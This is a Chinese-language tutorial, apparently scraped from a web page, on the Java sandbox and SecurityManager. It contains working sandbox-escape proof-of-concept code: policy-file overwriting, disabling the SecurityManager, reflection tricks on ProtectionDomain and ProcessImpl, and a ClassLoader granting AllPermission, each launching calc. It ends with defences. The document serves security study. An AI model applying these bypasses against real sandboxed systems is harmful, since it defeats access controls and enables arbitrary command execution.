Java沙箱限制下SecurityManager绕过手法详解<\/h1>

1. Java沙箱组成概述<\/h2>

Java沙箱是一种安全机制，用于隔离和保护Java应用程序的执行环境，防止未经授权的操作。它主要由以下五个核心组件构成：<\/p>

字节码校验器(Bytecode Verifier)<\/strong><\/p>

功能：校验字节码文件是否符合Java语言规范<\/li>
检查内容：类文件格式、操作码合法性、变量初始化等<\/li>
特点：并非所有类文件都会经过校验（如核心类库）<\/li> <\/ul> <\/li>

类加载器(Class Loader)<\/strong><\/p>

功能：负责将.class文件加载到JVM中<\/li>
特点：

支持自定义类加载器<\/li>
采用双亲委派机制（从顶层父类加载器开始层层委派）<\/li>
防止恶意代码加载伪造的同名类<\/li> <\/ul> <\/li> <\/ul> <\/li>

存取控制器(Access Controller)<\/strong><\/p>

功能：控制核心API对底层操作系统资源的访问<\/li>
特点：

使用安全策略文件(policy file)配置访问规则<\/li>
通过权限检查控制资源访问（文件、网络等）<\/li> <\/ul> <\/li> <\/ul> <\/li>

安全管理器(Security Manager)<\/strong><\/p>

功能：作为核心API和操作系统之间的接口，执行权限控制<\/li>
特点：

优先级高于存取控制器<\/li>
可拦截和限制特定操作（文件写入、线程停止等）<\/li> <\/ul> <\/li> <\/ul> <\/li>

安全软件包(Security Package)<\/strong><\/p>

功能：提供安全工具和扩展功能<\/li>
包含：

安全提供者（定义安全算法和服务）<\/li>
消息摘要（数据完整性验证）<\/li>
数字签名（数据认证和完整性保护）<\/li>
加密（对称和非对称加密）<\/li>
鉴别（用户身份验证）<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol>
2. ClassLoader在沙箱中的核心作用<\/h2>
自定义ClassLoader可以实现对局部Jar包或class文件的单独权限控制。通过在调用defineClass()方法时为加载的类设置ProtectionDomain：<\/p>
public<\/span> class<\/span> MyClassLoader<\/span> extends<\/span> ClassLoader {<\/span> <\/span><\/span> private<\/span> String rootDir;<\/span> \/\/ class文件所在根目录 <\/span><\/span><\/span><\/span> final<\/span> private<\/span> PermissionCollection permissionCollection;<\/span> \/\/ 权限集合 <\/span><\/span><\/span><\/span> <\/span><\/span> public<\/span> MyClassLoader<\/span>(<\/span>String rootDir)<\/span> {<\/span> <\/span><\/span> this<\/span>.<\/span>rootDir<\/span> =<\/span> rootDir;<\/span> <\/span><\/span> this<\/span>.<\/span>permissionCollection<\/span> =<\/span> new<\/span> MyPermissionCollection();<\/span> <\/span><\/span> \/\/ 添加权限 <\/span><\/span><\/span><\/span> this<\/span>.<\/span>permissionCollection<\/span>.<\/span>add<\/span>(<\/span>new<\/span> FilePermission(<\/span>"\/tmp\/-"<\/span>,<\/span> "read,write"<\/span>));<\/span> <\/span><\/span> this<\/span>.<\/span>permissionCollection<\/span>.<\/span>add<\/span>(<\/span>new<\/span> SocketPermission(<\/span>"127.0.0.1:8080"<\/span>,<\/span> "connect"<\/span>));<\/span> <\/span><\/span> this<\/span>.<\/span>permissionCollection<\/span>.<\/span>setReadOnly<\/span>();<\/span> \/\/ 设置为只读 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> protected<\/span> Class<?><\/span> findClass(<\/span>String className)<\/span> {<\/span> <\/span><\/span> \/\/ 读取class文件内容 <\/span><\/span><\/span><\/span> byte<\/span>[]<\/span> classData =<\/span> ...;<\/span> \/\/ 从文件读取字节码 <\/span><\/span><\/span><\/span> \/\/ 创建ProtectionDomain <\/span><\/span><\/span><\/span> ProtectionDomain pd =<\/span> new<\/span> ProtectionDomain(<\/span>null<\/span>,<\/span> permissionCollection);<\/span> <\/span><\/span> Class<?><\/span> clazz =<\/span> defineClass(<\/span>null<\/span>,<\/span> classData,<\/span> 0<\/span>,<\/span> classData.<\/span>length<\/span>,<\/span> pd);<\/span> <\/span><\/span> return<\/span> clazz;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3. Java沙箱三要素：权限<\/h2> 权限是Java安全模型的核心概念，包含三部分：<\/p> 权限类型<\/strong>：实现权限的Java类名（继承自java.security.Permission）<\/p> java.security.AllPermission：允许所有操作<\/li> java.lang.RuntimePermission：控制运行时操作（如线程停止）<\/li> java.io.FilePermission：控制文件操作<\/li> <\/ul> <\/li> 权限名<\/strong>：具体资源的位置或范围<\/p> 文件权限：如"\/tmp\/foo"<\/li> 网络权限：如"127.0.0.1:8080"<\/li> <\/ul> <\/li> 允许的操作<\/strong>：对资源的具体行为<\/p> 文件操作：read、write、execute<\/li> 网络操作：connect、accept<\/li> <\/ul> <\/li> <\/ol> 示例：<\/p> permission java.<\/span>security<\/span>.<\/span>AllPermission<\/span>;<\/span> \/\/ 权限类型 <\/span><\/span><\/span><\/span>permission java.<\/span>lang<\/span>.<\/span>RuntimePermission<\/span> "stopThread"<\/span>;<\/span> \/\/ 类型+名称 <\/span><\/span><\/span><\/span>permission java.<\/span>io<\/span>.<\/span>FilePermission<\/span> "\/tmp\/foo"<\/span> "read"<\/span>;<\/span> \/\/ 类型+名称+操作 <\/span><\/span><\/span><\/code><\/pre>4. SecurityManager使用<\/h2> Java Security Manager是沙箱机制的核心组件：<\/p> 功能：执行权限控制，通过抛出异常阻止无权限或敏感操作<\/li> 特点：从Java 1.0引入，默认禁用<\/li> 适用于Java 1.0 - Java 16<\/li> <\/ul> <\/li> <\/ul> 启动方式：<\/p> # 默认实现<\/span> <\/span><\/span>java -Djava.security.manager <\/span><\/span># 自定义实现<\/span> <\/span><\/span>java -Djava.security.manager=<\/span>net.sourceforge.prograde.sm.ProGradeJSM <\/span><\/span># 指定策略文件<\/span> <\/span><\/span>java -Djava.security.manager -Djava.security.policy=<\/span>"E:\/java.policy"<\/span> <\/span><\/span><\/code><\/pre>5. 策略文件详解<\/h2> 策略文件(policy file)是Java沙箱的核心管理要素，为每个代码来源(CodeSource)定义保护域(Protection Domain)。<\/p> 默认java.policy文件内容<\/strong>：<\/p> \/\/ 标准扩展默认拥有所有权限 <\/span><\/span><\/span><\/span>grant codeBase "file:${{java.ext.dirs}}\/*"<\/span> {<\/span> <\/span><\/span> permission java.<\/span>security<\/span>.<\/span>AllPermission<\/span>;<\/span> <\/span><\/span>};<\/span> <\/span><\/span> <\/span><\/span>\/\/ 默认授予所有域的权限 <\/span><\/span><\/span><\/span>grant {<\/span> <\/span><\/span> permission java.<\/span>lang<\/span>.<\/span>RuntimePermission<\/span> "stopThread"<\/span>;<\/span> <\/span><\/span> permission java.<\/span>net<\/span>.<\/span>SocketPermission<\/span> "localhost:0"<\/span>,<\/span> "listen"<\/span>;<\/span> <\/span><\/span> \/\/ 可读取的标准属性 <\/span><\/span><\/span><\/span> permission java.<\/span>util<\/span>.<\/span>PropertyPermission<\/span> "java.version"<\/span>,<\/span> "read"<\/span>;<\/span> <\/span><\/span> \/\/ ...其他属性读取权限 <\/span><\/span><\/span><\/span>};<\/span> <\/span><\/span><\/code><\/pre>java.security文件<\/strong>：<\/p> # 默认策略文件位置 policy.url.1=file:${java.home}\/lib\/security\/java.policy policy.url.2=file:${user.home}\/.java.policy # 是否允许通过命令行指定策略文件 policy.allowSystemProperty=true <\/code><\/pre> 6. 权限配置基本原则<\/h2> 没有配置的权限表示没有权限<\/strong>：默认拒绝所有操作<\/li> 只能配置允许的权限<\/strong>：不能直接禁止操作<\/li> 同种权限多次配置取并集<\/strong>：权限会合并<\/li> 统一资源的多种权限可用逗号分割<\/strong>： permission java.<\/span>io<\/span>.<\/span>FilePermission<\/span> "\/tmp\/foo"<\/span>,<\/span> "read,write"<\/span>;<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 7. Java沙箱逃逸手法<\/h2> 7.1 单等号配合写policy绕过<\/h3> 原理<\/strong>：<\/p> 使用-Djava.security.policy==java.policy<\/code>（注意双等号）<\/li> 单等号会将指定策略文件添加到默认策略文件之后<\/li> 如果home目录可写，可写入.java.policy<\/code>文件<\/li> <\/ul> 利用条件<\/strong>：<\/p> grant {<\/span> <\/span><\/span> permission java.<\/span>io<\/span>.<\/span>FilePermission<\/span> "C:\\Users\\Administrator\\*"<\/span>,<\/span> "write"<\/span>;<\/span> <\/span><\/span>};<\/span> <\/span><\/span><\/code><\/pre>攻击代码<\/strong>：<\/p> import<\/span> java.io.FileWriter;<\/span> <\/span><\/span>public<\/span> class<\/span> Exp<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> String homePolicyFile =<\/span> "grant {\n permission java.io.FilePermission \"<<ALL FILES>>\", \"execute\";\n};"<\/span>;<\/span> <\/span><\/span> FileWriter writer =<\/span> new<\/span> FileWriter(<\/span>"C:\\Users\\Administrator\\.java.policy"<\/span>);<\/span> <\/span><\/span> writer.<\/span>write<\/span>(<\/span>homePolicyFile);<\/span> <\/span><\/span> writer.<\/span>close<\/span>();<\/span> <\/span><\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>7.2 利用setSecurityManager绕过<\/h3> 原理<\/strong>：<\/p> 如果策略文件授予了setSecurityManager<\/code>权限<\/li> 可调用System.setSecurityManager(null)<\/code>禁用安全管理器<\/li> <\/ul> 利用条件<\/strong>：<\/p> grant {<\/span> <\/span><\/span> permission java.<\/span>lang<\/span>.<\/span>RuntimePermission<\/span> "setSecurityManager"<\/span>;<\/span> <\/span><\/span>};<\/span> <\/span><\/span><\/code><\/pre>攻击代码<\/strong>：<\/p> public<\/span> class<\/span> Exp<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> System.<\/span>setSecurityManager<\/span>(<\/span>null<\/span>);<\/span> <\/span><\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>7.3 反射绕过<\/h3> 7.3.1 getProtectionDomain反射绕过<\/h4> 原理<\/strong>：<\/p> 通过反射直接调用getProtectionDomain0()<\/code>方法<\/li> 绕过对getProtectionDomain()<\/code>方法的过滤<\/li> <\/ul> 利用条件<\/strong>：<\/p> grant {<\/span> <\/span><\/span> permission java.<\/span>lang<\/span>.<\/span>reflect<\/span>.<\/span>ReflectPermission<\/span> "suppressAccessChecks"<\/span>;<\/span> <\/span><\/span> permission java.<\/span>lang<\/span>.<\/span>RuntimePermission<\/span> "accessDeclaredMembers"<\/span>;<\/span> <\/span><\/span>};<\/span> <\/span><\/span><\/code><\/pre>攻击代码<\/strong>：<\/p> public<\/span> class<\/span> BypassSandbox<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> setHasAllPerm0(<\/span>"calc"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> setHasAllPerm0<\/span>(<\/span>String command)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> StackTraceElement[]<\/span> stackTraceElements =<\/span> Thread.<\/span>currentThread<\/span>().<\/span>getStackTrace<\/span>();<\/span> <\/span><\/span> for<\/span> (<\/span>StackTraceElement stackTraceElement :<\/span> stackTraceElements)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Class clz =<\/span> Class.<\/span>forName<\/span>(<\/span>stackTraceElement.<\/span>getClassName<\/span>());<\/span> <\/span><\/span> Method getProtectionDomain =<\/span> clz.<\/span>getClass<\/span>().<\/span>getDeclaredMethod<\/span>(<\/span>"getProtectionDomain0"<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span> getProtectionDomain.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> ProtectionDomain pd =<\/span> (<\/span>ProtectionDomain)<\/span> getProtectionDomain.<\/span>invoke<\/span>(<\/span>clz);<\/span> <\/span><\/span> if<\/span> (<\/span>pd !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> Field field =<\/span> pd.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"hasAllPerm"<\/span>);<\/span> <\/span><\/span> field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> field.<\/span>set<\/span>(<\/span>pd,<\/span> true<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> e.<\/span>printStackTrace<\/span>();<\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>command);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>7.3.2 ProcessImpl反射绕过<\/h4> 原理<\/strong>：<\/p> 通过反射直接调用ProcessImpl.start()<\/code><\/li> 绕过ProcessBuilder.start()<\/code>中的权限检查<\/li> <\/ul> 攻击代码<\/strong>：<\/p> public<\/span> class<\/span> BypassSandbox<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> reflectProcessImpl(<\/span>"calc"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> reflectProcessImpl<\/span>(<\/span>String command)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> Class clz =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.lang.ProcessImpl"<\/span>);<\/span> <\/span><\/span> Method method =<\/span> clz.<\/span>getDeclaredMethod<\/span>(<\/span>"start"<\/span>,<\/span> String[].<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>,<\/span> <\/span><\/span> String.<\/span>class<\/span>,<\/span> ProcessBuilder.<\/span>Redirect<\/span>[].<\/span>class<\/span>,<\/span> boolean<\/span>.<\/span>class<\/span>);<\/span> <\/span><\/span> method.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> method.<\/span>invoke<\/span>(<\/span>clz,<\/span> new<\/span> String[]{<\/span>command},<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> false<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>7.4 自定义ClassLoader绕过<\/h3> 原理<\/strong>：<\/p> 自定义ClassLoader加载恶意类<\/li> 设置ProtectionDomain为全部权限<\/li> 结合doPrivileged()<\/code>扩展权限范围<\/li> <\/ul> 利用条件<\/strong>：<\/p> grant {<\/span> <\/span><\/span> permission java.<\/span>lang<\/span>.<\/span>RuntimePermission<\/span> "createClassLoader"<\/span>;<\/span> <\/span><\/span> permission java.<\/span>io<\/span>.<\/span>FilePermission<\/span> "<<ALL FILES>>"<\/span>,<\/span> "read"<\/span>;<\/span> <\/span><\/span>};<\/span> <\/span><\/span><\/code><\/pre>攻击代码<\/strong>：<\/p> public<\/span> class<\/span> poc<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> MyClassLoader mcl =<\/span> new<\/span> MyClassLoader();<\/span> <\/span><\/span> Class<?><\/span> c1 =<\/span> Class.<\/span>forName<\/span>(<\/span>"Exp"<\/span>,<\/span> true<\/span>,<\/span> mcl);<\/span> <\/span><\/span> Object obj =<\/span> c1.<\/span>newInstance<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>class<\/span> Exp<\/span> {<\/span> <\/span><\/span> static<\/span> {<\/span> <\/span><\/span> AccessController.<\/span>doPrivileged<\/span>(<\/span>new<\/span> PrivilegedAction()<\/span> {<\/span> <\/span><\/span> public<\/span> Object run<\/span>()<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Process process =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> e.<\/span>printStackTrace<\/span>();<\/span> }<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> });<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>class<\/span> MyClassLoader<\/span> extends<\/span> ClassLoader {<\/span> <\/span><\/span> \/\/ ... 其他方法同上 ... <\/span><\/span><\/span><\/span> protected<\/span> final<\/span> Class<?><\/span> defineClazz(<\/span>String name,<\/span> byte<\/span>[]<\/span> b,<\/span> int<\/span> off,<\/span> int<\/span> len)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> PermissionCollection pc =<\/span> new<\/span> Permissions();<\/span> <\/span><\/span> pc.<\/span>add<\/span>(<\/span>new<\/span> AllPermission());<\/span> <\/span><\/span> ProtectionDomain pd =<\/span> new<\/span> ProtectionDomain(<\/span>new<\/span> CodeSource(<\/span>null<\/span>,<\/span> null<\/span>),<\/span> pc,<\/span> this<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span> return<\/span> this<\/span>.<\/span>defineClass<\/span>(<\/span>name,<\/span> b,<\/span> off,<\/span> len,<\/span> pd);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> return<\/span> null<\/span>;<\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>8. 防御措施<\/h2> 限制反射权限<\/strong>：<\/p> 不授予accessDeclaredMembers<\/code>和suppressAccessChecks<\/code>权限<\/li> 使用sun.reflect.Reflection<\/code>注册过滤规则： Reflection.<\/span>registerMethodsToFilter<\/span>(<\/span>Class<?><\/span> clazz,<\/span> String...<\/span> methodNames);<\/span> <\/span><\/span>Reflection.<\/span>registerFieldsToFilter<\/span>(<\/span>Class<?><\/span> clazz,<\/span> String...<\/span> fieldNames);<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 谨慎授予权限<\/strong>：<\/p> 避免不必要的权限授予（如createClassLoader<\/code>、setSecurityManager<\/code>）<\/li> 使用最小权限原则<\/li> <\/ul> <\/li> 策略文件安全<\/strong>：<\/p> 确保策略文件不可被恶意修改<\/li> 避免使用单等号加载策略文件<\/li> <\/ul> <\/li> 更新Java版本<\/strong>：<\/p> 使用最新Java版本，许多旧版绕过方法在新版中已修复<\/li> <\/ul> <\/li> <\/ol> 通过全面理解Java沙箱机制及其绕过手法，可以更好地设计和实施Java应用程序的安全防护策略。<\/p>